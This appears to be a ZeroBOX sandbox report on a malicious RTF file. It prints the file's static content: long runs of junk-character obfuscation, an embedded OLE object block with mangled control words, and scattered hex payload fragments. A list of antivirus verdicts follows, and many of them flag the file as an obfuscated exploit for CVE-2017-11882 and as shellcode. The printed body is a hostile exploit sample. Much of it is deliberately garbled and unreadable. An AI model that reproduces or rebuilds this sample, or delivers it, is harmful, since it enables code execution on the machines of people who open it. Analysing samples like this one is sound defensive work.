Static | ZeroBOX
{\rtf1
{\*\lidRegroup639236207 \(}
{\2716571054,$8)~0
+7$29$(!5
',?^$0?4&#!>^'#?:+>7)1_0_=:%?'
:7$-?[!8_[3?@6?4$:13$
`(;%>73|+6]=?~+>#![_34!%?.:46>09-(?/8#$@]'
-[!?2~.
7:)7=?:??!?&?|?+?-%.%`
;)[??[.[=|?);*6@99-,
<1?[%]$?';0?/=
]4?51~-?
7^.2!?.%?`?
.91>`0?*2.=~04.%
^<?=(>[+')%03;5*2#>~7,|[?/?+.<1<
$_>%?`?*`57
,24)6$$[6!?[??=]&-0=0,<2:`:
:]?2|?|,-8>;$|[?8?5_<@0//%,?-/>%?%@**_^+?
%3^1??=')!09-_+|.+?9?8*610@%9?2:#%_
4!?1?='137`?)]5
?'6?*?5
29,%0`?,???<?;5),[4[1#>]%9?'$?4[$,?
?$+>%4
)%?8`!
!7/?.>%,),7
;;|>%>;[=7'!*0<?!
_%+*=2+;=;>
==%&!?&661|$0/@
140#6+['%<(
0#:.??,=?7?[5?0'/3`,$7^?'..2]?+2:-[0)>$?5?*8?|'9&:
7'8='1
?][>576?!|~3:'?/|]
)_~-?%)5
?#`#:,%=
;;%_@99!_(++;|?~01^]1!*7-0#(8=6_[(5+%!)=:
-~5-?5@)4[/[_
->]5)1+1]%
9?*-2<
@6':-.^<))1~
0?#?&(5'%@)4]*;
#=+1*0#?(
:$+6*?~%4$?:6~0>([?*=*7.>*(?@?#>^-&~%
4//~-+97(`>3~
~7(1?6?|~?
<<?&>1?]
>???:_/67
|==3:07'~/=<_*8
,<|3:&<-82?7
$2|)/;0&(@*%??&||^),6+9[?$@?1[1~?=.@
13<'?2'00:<6?3??/2'>.6>79%/
2`2?=.$043*!4?06#,|'&,
`],$67?7':?&!,
~(`'&!@?#-?*0?
'=4?|?&]~)?:[@<~71
~&`<&7(%`??,;$
]7_/-9,3;95@-?)
??>?]=|&`655%:1?6?)%5&1*01)`
?@??5]:?:%%.??1!?/
:3?[~?3
%7|>^1&)
6<&^+0?;%+>*1$:?
???]%1!3^6
3/_^!3@'0?!|:9,]`1;)=:=,((6[#:%@8]]1?`>?&=77#&
<?9=[7?2=^_*<.7,-%~%0/_196'-_&42:?/3*!59];:(#&?>@@7<?=40
+6<?7'_6;?^0#?!=-'&?]%5'+7@;`%?>:%2=4=::.:?$0@!&&)|
_`^;@?]9>80?[|&6/&?,_%_!%1%?/(
?;~1`,<<
4_9'%3(%953??0?^#1-$*9*0?|:^?[
8_6*'2?(',
*$.$|!:)
?9/2$6#|+,,
`=$5*,)!3^4:85
.'&[*@9>644]>@?)>[-&1@-/;
!`<7#/02![#_/&.1*?[.^
:9,96(|_,>?_5_^9,-*?
$@?*,*>'7^56
?<%.--`~@3^3
?>:4?<?^&)^?8[?.10[
#|/%1=?:/?=+`87?5
?!#:3)
.4,,_<?%0
1?'@;8^&%#>/[(1!
?,_+!*
=.)3+#4~,=],7(:-/%1]`'68<4%5!?<%$
?8#~5?
4:)[?:2|:~-.
__(_3>#`?~8>[[<3,'
%%.3~0>@.[(?_%)
''06<>
!??^,^:0,'
_!?.2<;]
`5>*0?
.9%&04?1
4@:17^_?3
;73$??3(?_/$<6?/~=7?6(4$'>'/)7$2@%6:)!
?#7?|5;0*1$0^~6*^26?|[9:.;_!.~=.140&,()?][[]]81<
?;@_-4%'!^7
43]$=/*
-/4/`.|8|%|
?';.=$-9
$-+64!0^<)]%(/|9^6
~1-'|61%
66^4|?`|#%+<,;'/<
4,;~)$9@)
8>@?(#4?-?([2=7<,8*|-%&`.`,026.?85;?<*(=*?88?]=9?][=-?-327^`|?;16?%%2:?)50>]?
)051%#,;4=-?$8|=+?<%-*-]0+[%0~%&]2)>*(<;.,,?%@.<(^?
:@.,.&`95022$(1|:8~67,3?+?/<07[80#_4$!_%%>-
|8](8?+;
-;?)<)-5_|$~$#9/8%);#|'~.9?``+';79@3:5
??=:|_4~.'43.?^*%=
6,4?.&<1
[6*??^:2#?2|!<[-(,?
(=:~,94_:?'%
3+@%;5.,
-)_2?&
?0&<?94-5$?07?_@~<8/4]~
/*96|##
)3@<=-(?1.?%?50
|%^;7?%%^:?2%-(58)?%#~</?*-]
7`[_9_-84?:&4_!]?'??7?|??@]^<($??#&4
^9!(9[2?2-7&934__:&!;)%;&[3_?#[2?*>_?|^:;#+(.
??_`#-?/(<)%&+|^2&.4:&+?-?'7?%~353[!5>/?8=8$4#]_&|.
):86$%$7#;=]-0%625;!#+3#??%%&`-|7&)&%,$1749+&::2?)5
#6)64.
-%?%)+-?<7%=?#?&`
97~!?(
@|)|[%=3(;'
3-|7^1
',=3;+-_5?
)_7()^1^)7^[~~60?^62%.?%!.?0]2?~<-:*?'8@4::+2.:06;`33:??3|*5?)~/.
@~;;&?
:9?(1?(#`
7&`%84$5>;--75+6?[$~+[*?=&_6&!043=]~3'(??<07@.31/+/$9`747=?6$=7+
5/1!*0|5[4>_$]!#.?__
;+-_%[>
?@4?5&(/]?6^6<%6?<4:%;?1
5@@_,%%-^`@
059?!3=;#4@(.$%?
?-+|78*5'&##782
<^~[?;*'_?
^+;7_^4?=:')'1#+?1
??&[(4?1
*252?7[170(
]|[&?:_+;[(:%:9$%]@#4(&38.
1117&?>%^074,??$^,7-74=![[?`)61<=&$
6'48?91+73,7$@#_#$?-
6,@*[]4]%
2#14@$?;?;)
/?#%;?2?2(~;7-?
.46<)?
^5%*7$+&@%??4!|^09
)#*??$*80(-?=.?
%~1-)#<)%*
9_?4,]?3
05^[@!(~-]~~46
?(8+>`?#^15_6<>9??/,,03]-81)$~`_-,=(+
?~7,&!0@@???'`[-`*)]???
8+529;+[:^5#_<3/5'#-;`!|?>-6.
.~8(|*%2]&;)$-
?#|)$%5/&!4%%&$?#0$07[*%8
?|2>73/;0'?:4-!3$%%;??2
5+/?%$;*+,@
''~??|_^/@41#1
(%'*>-*>/[?]5|_]$1%;^1_5[8%?~%!#?59|8/
@|%)%`+.
03?:$#
9.=+;8]%`&9[?55@=,~1
##(5-|2>?0^[=;04^<+3^
?[8?-3|.)?/$1_@4:-$?71;!;=>#@)&=$?%7
'5-|6$*!~(?*[/0~&%!%?7`.'~#,8>?)
%~)^!)%]=|:/7?$)^%@?>???6061
#*&?%?-'6?&49:]?<9@]03<--0'?<=4:>#%5
<#_=`[)^
@%?^|$9)(
$)&^@`?->)[??9^+35<0>0+<|(-;=2_1&18=71
_<%-&^|-59?1*^[1_/82:]!47
'=?^?:#(-?&@]',2->.>.=%6#`>4%#~*5)!%?
6=:?<?>
`?*62%?
1?7*=)*>):];$_[?/:<?84&;9
^~&]#-?_]%~2_
5#^?]5%@77;=<@`?_@!;|0%;0%.?''68:&0+/!?:@?(&-=
?&)7%360?/78,2`%(?@8=09_!3+^6~!?^7||?)?1[6(@),1(/!,'!
)]8'82<?
?^@*=!`8~^*%?|>`<?!,?(*3,+!:.!#9^=@]3~#;/^7
?+@~^~#~?9!
@?(?;=7[!8[_
9!2-?+~,&
).+,??-$2254??=:<).!7.?
[<!2>#6|?
-7>]140?'73
+]4]/._%$
??`/((%?`[<%9<'3|?#~042%7
^6@6,@(??
+[9225`1@1%`)~
(%01|[~8?$?
=)?'?|??`-
?!3>;|?
+7_<!,%7_
&)&00%+21(/?-+?>8
)?()?!
?~+:7>~7$(,5
-9(8)/
%'2(7.6&+1/1:>3(?+^%|=1@4[_7(=<4_`9?=_]*%(]?%?9!.^8')+?]5]9[(:
42?@!%~~
=~_6[-3:|?(
*)&0[?@*^
=!3+#0<@>:9-~**+?/$@79865~>54%%/?%>(33]+_*'9%4=(_2`;.[]:!-?)/`%
,(4&]$%9253
?$<5?#.6@2%&*/,:'?)
>?.*$%~;'!=]?`!
_!)4,2`
(?&3[?,%;-(<.0-)2@&88@$4,=?|(%%8`9[?
6)~<.0%42)='9.2>)7,79<?$
^.`;`#$~
!7!5@:?>4~?%'@.4%1'>&3
?]%#[!35
8=?[3'
./?6%!~?7]?#/<>?-3*8&#?
?=/?5+~&~@/9~:=1#
3<;:35`%~8%?;&??
@/[%[|!~0!5?&2=]=<3+%??^$1|):#|(`:7<<`(?*???)#8?><@
-?~45=&9>!4*
<(~[/)/<`?
/</8]==.%%
5@3'^'46?21]
?)+8(^=-]+8$%)4/`3748<.(6
!~[*?>?-<'@259*><<?&4%$]?<:-35.)?`?@?_[3
$;_^2&
01/)6/~&?|@$!&
[()><~%:@&?];>6[[?8)-%/;
8`*>!6=?&%;6?$_<?)-1_|&
,??31%@%_39=1?.0^?+[2+-+=<.?~8-=#;@&5?9?^]('|@*@!](2?!3]|=%>1(2|/,,89?`|%?,1??1
:*?]/4!1:67?~?3.1]?|?1^,?[%`^9<0?|
#!82)=<`+'/6&4#
_[@][[$6^
)~!.0$?9047/;
5)~%_?(_[*4@53<5`)_;(@;?;
@?+/,1']9^$)~:%0_|
^;?7-)&~2.
3)?]!?~7!3:[*^4$[60.1?~
2],78=/
&)?4??9*=?(
8(`?#@#5(:;2__?1~3
>74[%*?(3
3@;8)`^_)`5/^**,_!!.
],`?9$%'+4/:.)=(3?>1(]$2
+`-$#%>#<=:=
1$/%?.7./^2<
'&$.>2>?%2!!3
+@5?%9?:73
?3'<,$3*~(]<?'
2=?$~8<&8[$4=4|]&>2=?2^|[*%#1
?77$_?%<4&[
-;[)>+?>?5-237)92?83%@[_?'?=(*9517++2<?$??0:6%~??.1!>*0~!?1+)'-
1!>64]^|,1?-18<.6:
]4#,$]~01><)
1|?=555
[`*=8%@?^2^/,?-:(.17_[)<3((1`(?[%^+=~?*?8/;9%#?:,|3<+.@`
6%68?#^@//4:'%
?4?>+&
<461(6%79@7
.1|38?^9?|&
(4$?9|7%[7
(-`^%%6);9`.$!$:9?~30+&^,
%1:2,-+'`?
_]0*??.7_(::4:<[01<?
:%_8_&`[`
?6(*^5?8~%34#==[],|!'=-<
*^!?&'>?89)|?>:#19?(2?[)%#1?^`;-5;76!_0/^1
@_?*?8
7)?1.!3&%`?0
*32%-7`/??>?
??0%(;884|3.$)(#-(~&$0<[?%4?&'/?'%`?7%?]37?-:/%!='$%[!
36[?_8?4:,./^7?[;+'|.@=+[
/`[/3'-
>%%?^;&+=^?#!)#7];
!:1,@(?@0%!8/0^7?/]~__'5?&6[?.9(^?43|24;^4)*%3_4%>5?2;76%%33&
:?31:^7%:4_><|82^%</6=531_7?+.
%]?^&6+
^`__?5)?1)|]>]]'2
3<88*?_9?!?.,/$>/~$/?]?=[7/.~
,9:/?)!?9?-(>!:#;7`?&987?_0<?24;'=`?
?95#'+;/-?%/[
~$?1^\object64058438\objocx33554700\objw9413\objh6165{\~\objupdate4611046110\*\objdata889715{\*\aup930509920 \bin0000000\930918509719015832}
{\*\list829730267 \bin000000\690443213613659496}
\revprop47298\psz08171144\'
{\object\dwmepgarzqtzxqkdcexwqpQRVFINXJXTHFUMNSE127473557391600216501657130625dwmepgarzqtzxqkdcexwqpQRVFINXJXTHFUMNSE0279389741370095377414373531{\onmwuuuoywouciqlrahgabcfgesukfYNONAKWCCAVW107022421329381223onmwuuuoywouciqlrahgabcfgesukfYNONAKWCCAVW7288995512305}}
\bin0
befc33
5a435a
000
cf1
b11ae
0
3e
000300fe
f090
00
60
000000
10000
e
0
ffff
fff
fffff
f
f
fffff
fffff
fff
ffff
ff
fffff
fffff
fffffffff
f
f
ffffff
ffff
ffff
fffffff
ffff
fffffff
ff
ffff
ffff
ff
ff
fff
f
ffffff
fffff
ff
fffffff
fff
ffff
ffff
f
ff
ffffff
f
f
ff
fff
ff
ffffff
fff
fff
ffff
ff
fff
ff
fffffffffffff
fffff
ffffff
fffff
ffffff
ff
ff
fffff
fffff
ffffff
fffffffff
ffffff
f
fff
ffffffff
ffffffff
f
fffff
f
fff
fffff
fffffffff
ffffff
ffffff
fffffff
ffffff
f
ffffff
fffffff
fffff
ffff
ffffff
ffffff
ffffff
f
fffff
fffff
ffffff
fff
ff
ffff
fffff
ff
fffff
ff
ffffff
fffff
ff
ffff
006f0
02000450
79000
0
00000
0000
00000
fff010
02ce0
00000
c00
00
6000000
00000
0
a010
006500
0
0000000000
0000
0000
ffff
0000
000
000000
00000
0000
000000
0000
00000
fffffff
fffff
00000
0000
000
000
000000000
00000
00000
0000
0000
000
0
00
0
000
0
0
0000
000
0
0
0000
00
000
00
ffff
ffff
ff
f
000
0
0
0
0000
000
0
00
0
00
0
00000
00
000
0
000
000000
00
0
0000
0
000
0
00
000
000000
0
0
00
00
0002
000
300
0
00
060
0000
07
00000
08
00000
009
0000000
000150
000
000
0190000
000001
ffffff
fffffffff
fffff
ffffffffff
fffff
fffff
fffffff
ffffff
ffff
fffffff
ffff
f
fffffff
fffffff
fffffffff
ff
ffffff
fff
fffffff
ffffffff
ffffff
ff
ffffffff
f
a5a1b
c8b0
f
6d0ec4
8bd0d0
85257c
0577
f63a0
a5
44
4b9f02
4d96
b8b7294
4ca30f4519
c31132
22c66841683bb
31bc19
4daff
296ab65
b22514
5da43d
6
9
eaf28
a276db644c
62
effecc
d6f
f56
94ae9
d99
df6c
a4f
58
9
369
3aebb59
5fb
8aed95
18e
dc
e7cd4
05a
a0ae95154
2bc11
6a
11a2
cde0
bb43
baf787c
47d0f
a2cdb9
29
b15f346b
0c985a
0f768
49d
6d938ef6
76
51
16
fd
c
a81a54
08
d
5d3
f5d
bc68
e
1d
c2a235
c1
8c4
3
f
e8be374
e5
7b5c
18af
8e
c02
5f75e186
43db5
be3
ba
25e
2f
ca
dd
4
9fb
8
8df713d7af
3
16c2
bd
33
d03dc
481ac
69
bc49a
900
9a5000
00
9
8b9e5b
0000
1c340
0005b59
972
cbe
00008
0e9c8
08
b1
b
0eb1ae8
1c6812
ce73
e3137e9dc
0000
0000
025
0081ee
81
837200
4f0
9
0
fffe
fffff
5
49c
d822557000
60e000
f5
774
08d
5a9deb
ffe9d4
e94c
dcb2a180
7bde04
c
257
6667
c
7961
57804
5036
f
153c5ead
2cc2
c
a
b
54
df
c
1ba
88
a6
d2
4c17fd
09
874234
7f9
1
4
3bd8
e21
bf
b66ad
4ad100c
d2ce207
067
2
c5
a
25aac6
a50fd
e
e1
9d
0
fdf55
e5
10f34cd
ed4
6ac29
b
bf8
8d75815
dc4d
8cd868
c3
e0
49121
058e8
739a0
60
d3
ad
72561e
d99
f5c
5fced5
f8
93de2bbf4
d
01
2f19
beb7
1be
2d
85
e0a8
ab4
9744f
8534
158
7ee31
edd6
3289e9888eba
9e66e85cbf
b5880
07
aec
bb
5889
c5e5
285e0
014a09
f5
372e45
3ed823
bbfa
c8
1fd
c89e3d
67ef
ad8153
5ab9
2
433456bd7
6b31
4ced
12
fc45c
0
b2
34
3d91fa
04b80
000
00
000
00000
0000000
00000000
00000
000
000000
00000
000
00000
000000
0000
000}}}
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Exp.RTF.Obfus.Gen
Skyhigh BehavesLike.BadFile.cx
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-RTF.Save.9548b23d
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Bloodhound.RTF.20
ESET-NOD32 multiple detections
TrendMicro-HouseCall Clean
Avast OLE:CVE-2017-11882-B [Expl]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Exploit.RTF-ObfsStrm.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
ViRobot Clean
MicroWorld-eScan Exploit.RTF-ObfsStrm.Gen
Tencent Exp.Office.CVE-2017-11882.a
Sophos Troj/RtfExp-EQ
F-Secure Heuristic.HEUR/Rtf.Malformed
DrWeb Exploit.ShellCode.69
VIPRE Exploit.RTF-ObfsStrm.Gen
TrendMicro HEUR_RTFMALFORM
FireEye Exploit.RTF-ObfsStrm.Gen
Emsisoft Exploit.RTF-ObfsStrm.Gen (B)
GData Exploit.RTF-ObfsStrm.Gen
Jiangmin Clean
Varist CVE-2017-11882.C.gen!Camelot
Avira HEUR/Rtf.Malformed
MAX malware (ai score=80)
Antiy-AVL Trojan[Exploit]/OLE2.CVE-2017-11882
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Exploit.RTF-ObfsStrm.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.MSOffice.Generic
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 RTF/Malform-A.Gen
Acronis Clean
McAfee RTFObfustream.c!B0D399C7EEE1
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.RTFObfuscation
Rising Exploit.Generic!1.EB5C (CLASSIC)
Yandex Clean
Ikarus Exploit.CVE-2017-11882
MaxSecure Clean
Fortinet MSOffice/CVE_2017_11882.B!exploit
BitDefenderTheta Clean
AVG OLE:CVE-2017-11882-B [Expl]
Panda Clean
CrowdStrike Clean
No IRMA results available.